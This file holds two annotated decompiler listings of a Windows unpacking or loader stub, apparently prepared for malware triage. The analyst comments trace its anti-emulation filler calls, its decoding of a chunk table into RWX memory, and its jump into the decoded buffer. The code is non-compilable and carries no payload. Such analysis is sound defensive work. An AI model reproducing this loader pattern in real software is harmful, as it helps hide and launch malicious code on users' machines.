/*
 * fn1310E09B: decompiler pseudo-C for the routine at 0x1310E09B (same address
 * as the `main` listing that follows in this file). Line breaks are restored
 * from a collapsed listing; the tokens are unchanged.
 *
 * What the visible code does:
 *   1. Calls several Win32 APIs whose arguments look arbitrary, and uses the
 *      SafeArrayGetUBound return value as a base pointer (eax_36).
 *   2. Reads five dwords at large constant offsets from eax_36, each followed
 *      by a call to fn1310E000 with length 4 and a running offset 0/4/8/0xC/0x10.
 *   3. Allocates memory with VirtualAlloc(…, 0x3000, 0x40), i.e.
 *      MEM_COMMIT | MEM_RESERVE with PAGE_EXECUTE_READWRITE.
 *   4. Copies bytes one at a time, chunk by chunk, driven by a table of dword
 *      pairs that follows the five header dwords.
 *   5. Calls fn1310E000 once more over the allocation, then makes an indirect
 *      call to allocation + 0xF50.
 *
 * NOTE(review): fn1310E000 is not in this listing; its call pattern suggests a
 * decode/transform routine taking (dst, src, length, key?, offset, state?).
 * TODO confirm.
 * NOTE(review): steps 3-5 (RWX allocation, byte-wise fill, transfer of control
 * into the allocation) are the usual shape of an unpacking/loader stub. For
 * triage, the region returned by VirtualAlloc after the final fn1310E000 call
 * is the artefact to capture.
 */
word32 fn1310E09B()
{
	// NOTE(review): 0x5C000000 is not a documented SetErrorMode flag
	// combination; this and the two Wmi* calls look like filler/anti-emulation
	// calls. Confirm against the disassembly.
	SetErrorMode(0x5C000000);
	ADVAPI32.dll!WmiReceiveNotificationsA();
	GetStartupInfoA(fp + 0xFFFFFD6C);
	ADVAPI32.dll!WmiSetSingleInstanceW();
	// Called with a null array pointer, yet the return value is used below as
	// the base for every header read.
	// NOTE(review): if the call returns E_INVALIDARG (0x80070057), then
	// eax_36 + 0x9309E6A9 wraps to 0x1310E700, close to this routine's own
	// address. Treat as an assumption and verify in a debugger or emulator.
	Eq_63 * eax_36 = SafeArrayGetUBound(null, 0x0006C000, (LONG *) 0x00012C00);
	// NOTE(review): as rendered, the second comparison adds two different
	// constants to the same value and cannot hold. The `main` listing compares
	// two different API return values here, so this is probably a decompiler
	// merge artefact. Confirm.
	if (eax_36 != (Eq_63 *) 0xFC110199 && eax_36 + 0x80010332 == eax_36 + 0xFFFD0199)
	{
		// Header dword 0 (stream offset 0): one of the three terms of the
		// allocation size below.
		word32 ebx_303 = eax_36->dw9309E6A9;
		fn1310E000(fp + 0xFFFFFDC4, fp + 0xFFFFFDC4, 0x00000004, fp - 0x00000010, 0x00000000, fp + 0xFFFFFDCC);
		// Header dword 1 (offset 4): saved in dwLoc0258 and later passed as the
		// length argument of the final fn1310E000 call.
		word32 edi_328 = eax_36->dw9309E6AD;
		fn1310E000(fp + 0xFFFFFDA8, fp + 0xFFFFFDA4, 0x00000004, fp - 0x00000010, 0x00000004, fp + 0xFFFFFDCC);
		// Header dword 2 (offset 8): saved in dwLoc14 and compared with the
		// chunk counter dwLoc08, so it acts as the chunk count.
		ui32 edi_351 = eax_36->dw9309E6B1;
		fn1310E000(fp - 0x00000014, fp - 0x0000001C, 0x00000004, fp - 0x00000010, 0x00000008, fp + 0xFFFFFDCC);
		// Module handle for the NULL name; used as the base that chunk offsets
		// are added to.
		Eq_138 eax_378 = GetModuleHandleA(0x00000000);
		// Header dword 3 (offset 0xC): added to the module base for the first
		// source pointer.
		word32 eax_386 = eax_36->dw9309E6B5;
		fn1310E000(fp - 0x0000001C, fp - 0x00000028, 0x00000004, fp - 0x00000010, 0x0000000C, fp + 0xFFFFFDCC);
		// Header dword 4 (offset 0x10): the value the per-chunk byte counter
		// dwLoc0264 is compared against.
		dwLoc0248 = eax_36->dw9309E6B9;
		fn1310E000(fp + 0xFFFFFDB8, fp + 0xFFFFFDA8, 0x00000004, fp - 0x00000010, 0x00000010, fp + 0xFFFFFDCC);
		// count * 8 + 0xC: presumably the size of the header plus table (8
		// bytes per table entry). TODO confirm.
		word32 eax_449 = edi_351 * 0x00000008 + 0x0000000C;
		dwLoc0258 = edi_328;
		dwLoc14 = edi_351;
		dwLoc20 = eax_378;
		// Running stream offset passed to fn1310E000; 0x14 = the five dwords
		// already consumed.
		dwLoc024C = 0x00000014;
		// Table cursor: first dword after the five header dwords.
		dwLoc24 = eax_36 + 0x9309E6BD;
		dwLoc2C = eax_449;
		// 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
		// The return value is not checked for NULL before it is written to.
		dwLoc0260 = VirtualAlloc(0x00000000, eax_449 + edi_328 + ebx_303, 0x00003000, 0x00000040);
		// First source pointer: header dword 3 + module base + eax_449.
		dwLoc0C = eax_386 + eax_378 + eax_449;
		// The byte counter starts at eax_449 rather than 0.
		dwLoc0264 = eax_449;
		dwLoc08 = 0x00000000;
		dwLoc18 = 0x00000000;
		goto l1310E32A;
	}
	// NOTE(review): as rendered, the loop is also reached when the test above
	// fails, with every dwLoc* unset. Treat that path as undefined.
l1310E32A:
	while (0x00000001 != 0x00000000)
	{
		// Current chunk exhausted: advance to the next table entry or finish.
		if (dwLoc0264 == dwLoc0248)
		{
			ui32 edx_221 = dwLoc08 + 0x00000001;
			dwLoc08 = edx_221;
			// All chunks copied.
			if (edx_221 == dwLoc14)
				goto l1310E45A;
			// Table entry, first dword: source offset relative to the module base.
			word32 edx_227 = dwLoc24->dw0000;
			fn1310E000(fp - 0x0000001C, fp - 0x0000001C - dwLoc024C, 0x00000004, fp - 0x00000010, dwLoc024C, fp + 0xFFFFFDCC);
			Eq_253 * esi_257 = &dwLoc24->t0004;
			word32 ebx_254 = dwLoc024C + 0x00000004;
			// Table entry, second dword: length of the next chunk.
			dwLoc0248 = esi_257->dw0000;
			fn1310E000(fp + 0xFFFFFDB8, fp + 0xFFFFFDB8 - ebx_254, 0x00000004, fp - 0x00000010, ebx_254, fp + 0xFFFFFDCC);
			dwLoc024C = ebx_254 + 0x00000004;
			dwLoc24 = esi_257 + 0x00000004;
			dwLoc0264 = 0x00000000;
			dwLoc0C = edx_227 + dwLoc20;
			goto l1310E415;
		}
l1310E415:
		// Copy one byte from the source cursor.
		// NOTE(review): as rendered, the store always targets byte 0 of the
		// allocation and dwLoc18 is never used as an index. The `main` listing
		// writes to local20 + local4, so the index was probably lost by the
		// decompiler.
		dwLoc0260->b0000 = dwLoc0C->b0000;
		dwLoc0C = dwLoc0C + 1;
		dwLoc18 = dwLoc18 + 0x00000001;
		dwLoc0264 = dwLoc0264 + 0x00000001;
	}
l1310E45A:
	// Final fn1310E000 pass over the allocation: length = header dword 1,
	// offset argument = eax_449.
	word32 eax_147 = fn1310E000(dwLoc0260, dwLoc0260 - dwLoc2C, dwLoc0258, fp + 0xFFFFFDC8, dwLoc2C, fp + 0xFFFFFDCC);
	// Control is transferred into the RWX allocation at offset 0xF50.
	(dwLoc0260 + 0x00000F50)();
	return eax_147;
}
// address: 0x1310e09b
/*
 * Second decompiler rendering of the routine at 0x1310e09b (the same address
 * as fn1310E09B earlier in this file). Line breaks are restored from a
 * collapsed listing; the tokens are unchanged. The trailing `// rNN` and
 * `// m[esp - N]` comments on the declarations are the decompiler's own
 * register and stack-slot annotations.
 *
 * Visible behaviour: API calls whose return values drive a gate; five dword
 * reads at constant offsets from the SafeArrayGetUBound return value, each
 * followed by proc1(…, 4, …, 0/4/8/12/16, …); a VirtualAlloc with 0x3000 / 64
 * (MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); a byte-wise copy loop
 * driven by a table of dword pairs; a final proc1 call; then an indirect call
 * involving local20 and 0xf50.
 *
 * NOTE(review): proc1 is presumably the routine the other listing names
 * fn1310E000 (same call sites, same length and offset arguments). Its body is
 * not shown here.
 * NOTE(review): the offsets `eax_1 - 0x6cf61957 …` equal `+ 0x9309E6A9 …`
 * modulo 2^32, i.e. the same fields the other listing reads.
 * NOTE(review): API calls are shown without arguments and several values are
 * marked "also results in …", so the calling convention was not recovered.
 * Trust the data flow only after checking the disassembly.
 */
int main(int argc, char *argv[], char *envp[])
{
    __size8 al; // r8
    __size16 ax; // r0
    char bl; // r11
    __size8 cl; // r9
    __size16 cx; // r1
    unsigned char dl; // r10
    __size16 dx; // r2
    unsigned char *eax; // r24
    void *eax_1; // r24{45}
    __size32 eax_2; // r24{185}
    __size32 eax_3; // r24{486}
    __size32 ebp; // r29
    int ebx; // r27
    char *ebx_1; // r27
    int ebx_2; // r27{84}
    __size32 ecx_1; // r25{18}
    unsigned int edi; // r31
    char *edi_1; // r31
    unsigned int edi_2; // r31{116}
    unsigned int edx; // r26
    unsigned char *esi; // r30
    int esp; // r28
    void *esp_1; // r28{67}
    void *esp_2; // r28{309}
    void *esp_3; // r28{541}
    void *esp_4; // r28{559}
    __size32 local0; // m[esp - 16]
    unsigned int local1; // m[esp - 8]
    __size8 local10; // m[esp - 560]
    __size8 local11; // m[esp - 562]
    __size8 local12; // m[esp - 563]
    __size8 local13; // m[esp - 564]
    int local14; // m[esp - 572]
    unsigned int local15; // m[esp - 580]
    unsigned char *local16; // m[esp - 584]
    void *local17; // m[esp - 588]
    __size32 local18; // m[esp - 596]
    unsigned int local19; // m[esp - 600]
    unsigned char *local2; // m[esp - 12]
    unsigned char *local20; // m[esp - 608]
    void *local21; // m[esp - 612]
    __size32 local22; // m[esp - 780]
    __size32 local23; // m[esp - 784]
    int local24; // m[esp - 788]
    __size32 local25; // m[esp - 792]
    unsigned int local26; // m[esp - 796]
    unsigned int local27; // m[esp - 800]
    unsigned int local28; // m[esp - 804]
    union { void * x151; int x152; } local29; // m[esp - 576]
    unsigned int local3; // m[esp - 20]
    unsigned int local30; // m[esp - 776]
    int local35; // m[esp - 584]
    int local4; // m[esp - 24]
    char *local5; // m[esp - 28]
    unsigned int local58; // m[esp - 8]{573}
    __size32 local6; // m[esp - 32]
    void *local63; // esp_3{541}
    unsigned int local64; // local1{603}
    union { unsigned char * x149; int x150; } local65; // local16{607}
    union { int x143; __size32 * x144; } local7; // m[esp - 36]
    void *local8; // m[esp - 40]
    unsigned char *local9; // m[esp - 44]

    // API prologue. Arguments were dropped by the decompiler; the other listing
    // shows the constants that were pushed.
    ecx_1 = SetErrorMode();
    WmiReceiveNotificationsA();
    GetStartupInfoA();
    // Return value becomes the base (eax_1) for every header read below.
    eax_1 = SafeArrayGetUBound();
    local29 = eax_1 - 0x2fe67;
    eax = WmiSetSingleInstanceW(); /* Warning: also results in edx, esp_1 */
    local63 = esp_1;
    // Gate on the API return values: the setup block runs only when edx is not
    // 0x3ec0000 and the two derived values match.
    // NOTE(review): looks like an environment/emulation check; confirm.
    if ( !(edx == 0x3ec0000 || eax - 0x7ffbfe67 != eax_1 - 0x2fe67)) {
        // Four bytes stored at esp-564, esp-563, esp-562 and esp-560; the
        // address esp-564 is later passed as the sixth proc1 argument.
        // NOTE(review): presumably key/state bytes for proc1; confirm.
        local13 = -15;
        local12 = 28;
        local10 = 117;
        local29 = eax_1 - 0x6cf61957;
        // Header dword 0: a term of the allocation size.
        ebx_2 = *(eax_1 - 0x6cf61957);
        local14 = ebx_2;
        bl = proc1(&ebx_2, esp - 572, 4, &local0, 0, &-15, bl, ebx_2);
        local8 = esp;
        local11 = -26;
        // Header dword 1: kept in local19, later the length of the final proc1
        // call.
        edi_2 = *(eax_1 - 0x6cf61953);
        local19 = edi_2;
        bl = proc1(&edi_2, (esp - 604), 4, &local0, 4, &-15, bl, esp - 600);
        // Header dword 2: kept in local3 and compared with the chunk counter
        // local1.
        edi = *(eax_1 - 0x6cf6194f);
        local3 = edi;
        bl = proc1(&edi, esp - 28, 4, &local0, 8, &-15, bl, esp - 28);
        local30 = 0;
        // Module base that chunk offsets are added to.
        eax_2 = GetModuleHandleA();
        local6 = eax_2;
        local18 = eax_2 + 0x1000;
        // Header dword 3.
        eax = *(eax_1 - 0x6cf6194b);
        bl = proc1(&eax, esp - 40, 4, &local0, 12, &-15, bl, esp - 28); /* Warning: also results in ebx */
        local5 = eax + eax_2;
        // Header dword 4: the value the per-chunk byte counter local21 is
        // compared against.
        esi = *(eax_1 - 0x6cf61947);
        local16 = esi;
        local27 = esp - 584;
        ax = proc1(&esi, esp - 600, 4, &local0, 16, &-15, bl, ebx); /* Warning: also results in cx, dx, al, cl, bl */
        // Running stream offset (20 = five dwords consumed) and table cursor.
        local17 = 20;
        local7 = eax_1 - 0x6cf61943;
        local9 = edi * 8 + 12;
        // local22..local25 mirror the VirtualAlloc arguments as stack slots.
        local22 = 64;
        local23 = 0x3000;
        ebx = edi * 8 + edi_2 + 12;
        local24 = ebx + ebx_2;
        local25 = 0;
        // 0x3000 = MEM_COMMIT | MEM_RESERVE, 64 (0x40) = PAGE_EXECUTE_READWRITE.
        // The result is not checked for NULL before use.
        eax = VirtualAlloc(0, ebx + ebx_2, 0x3000, 64); /* Warning: also results in esp_2 */
        local63 = esp_2;
        local20 = eax;
        // NOTE(review): `eax` was just overwritten by VirtualAlloc, whereas the
        // other listing uses header dword 3 in this sum. Probably a register
        // naming collision in this decompiler; confirm.
        edi_1 = eax + eax_2 + edi * 8 + 12;
        local2 = edi_1;
        local15 = edi * 8 + 12;
        local21 = edi * 8 + 12;
        local1 = 0;
        local4 = 0;
    }
    // NOTE(review): as rendered, the loop is also entered when the gate above
    // fails, with the locals unset.
    for(;;) {
        esp_3 = local63;
        local58 = local1;
        local64 = local58;
        local65 = local16;
        // Still inside the current chunk: go straight to the byte copy.
        if (local21 != local16) {
            goto L0;
        }
        local1 = local58 + 1;
        local64 = local1;
        // All chunks processed: final proc1 pass, then the indirect call.
        if (local1 == local3) {
            // The decompiler renders the argument pushes as explicit stores
            // below esp_3.
            *(union { void * x171; int x172; }*)(esp_3 - 4) = esp - 564;
            *(unsigned char **)(esp_3 - 8) = local9;
            *(union { void * x173; int x174; }*)(esp_3 - 12) = (esp - 568);
            *(unsigned int*)(esp_3 - 16) = local19;
            ecx = local20 - local9;
            *(int*)(esp_3 - 20) = ecx;
            *(unsigned char **)(esp_3 - 24) = local20;
            // proc1(allocation, allocation - local9, local19, …, local9, …):
            // one pass over the copied buffer.
            eax_3 = proc1(*(esp_3 - 24), *(esp_3 - 20), *(esp_3 - 16), *(esp_3 - 12), *(esp_3 - 8), *(esp_3 - 4), bl, esp - 568); /* Warning: also results in ax, cx, dx, al, cl, bl, edx, edi */
            *(void **)(esp_3 - 4) = local8;
            *(union { void * x175; int x176; }*)(esp_3 - 8) = esp - 564;
            *(unsigned int*)(esp_3 - 12) = local19;
            *(int*)(esp_3 - 16) = local14;
            *(unsigned char **)(esp_3 - 20) = local20;
            esi = local20 + local19;
            *(void **)(esp_3 - 24) = esi;
            // Indirect call into the RWX allocation.
            // NOTE(review): rendered here as `*local20 + 0xf50`, while the other
            // listing shows allocation + 0xF50 with no dereference. The long
            // argument list is what this decompiler emits when it cannot
            // recover the callee's signature; it is not a real parameter list.
            (*local20 + 0xf50)(local28, local27, local26, local25, local24, local23, local22, local30, 0x15000, 0, 0x5d000000, 0xe6000, 0x370000, 0x328000, 0, 0x6c000, 0x12c00, (esp - 660), 0, ecx_1, 0x5c000000, (esp - 544), eax, local20 + 0xf50, local20 + 0xf50, local21, local20, local19, local18, local17, local16, local15, local29, local14, local13, local12, local11, -38, local10, local9, local8, local7, local6, local5, local4, local3, local0, local2, local58 + 1, ebp, argc, argv, envp, ax, cx, dx, al, cl, (unsigned char) local58 + 1, bl, eax_3, local14, edx, local20, esp - 4, esi, edi, ADDFLAGS32(local20, local19, esi), ADDFLAGS32(local20, local19, esi), ADDFLAGS32(local20, local19, esi));
            return eax;
        }
        // Next table entry, first dword: source offset relative to the module
        // base.
        edx = *local7;
        *(union { void * x159; int x160; }*)(esp_3 - 4) = esp - 564;
        *(void **)(esp_3 - 8) = local17;
        *(union { void * x161; int x162; }*)(esp_3 - 12) = esp - 16;
        *(__size32*)(esp_3 - 16) = 4;
        esi = esp - local17 - 28;
        *(union { unsigned char * x147; int x148; }*)(esp_3 - 20) = esi;
        *(union { void * x163; int x164; }*)(esp_3 - 24) = esp - 28;
        bl = proc1(*(esp_3 - 24), *(esp_3 - 20), *(esp_3 - 16), *(esp_3 - 12), *(esp_3 - 8), *(esp_3 - 4), bl, esp - 28);
        ebx_1 = edx + local6;
        local5 = ebx_1;
        local17 += 4;
        local7 += 4;
        // Second dword of the entry: length of the next chunk.
        ebx = *local7;
        local35 = ebx;
        *(union { void * x165; int x166; }*)(esp_3 - 4) = esp - 564;
        *(void **)(esp_3 - 8) = local17;
        *(union { void * x167; int x168; }*)(esp_3 - 12) = esp - 16;
        *(__size32*)(esp_3 - 16) = 4;
        edi = esp - local17 - 584;
        *(int*)(esp_3 - 20) = edi;
        *(union { void * x169; int x170; }*)(esp_3 - 24) = esp - 584;
        ax = proc1(*(esp_3 - 24), *(esp_3 - 20), *(esp_3 - 16), *(esp_3 - 12), *(esp_3 - 8), *(esp_3 - 4), bl, ebx); /* Warning: also results in cx, dx, al, cl, bl */
        local65 = local35;
        local17 += 4;
        local7 += 4;
        // Reset the per-chunk byte counter and point the source cursor at the
        // new chunk.
        local21 = 0;
        local2 = ebx_1;
L0:
        esp_4 = esp_3;
        local1 = local64;
        local16 = local65;
        // Copy one byte: destination = allocation + running index local4,
        // source = local2.
        ebx_1 = local20 + local4;
        dl = *local2;
        *(unsigned char*)ebx_1 = dl;
        local2++;
        local4++;
        local21++;
        local15++;
        local63 = esp_4;
        local63 = esp_4;
    }
}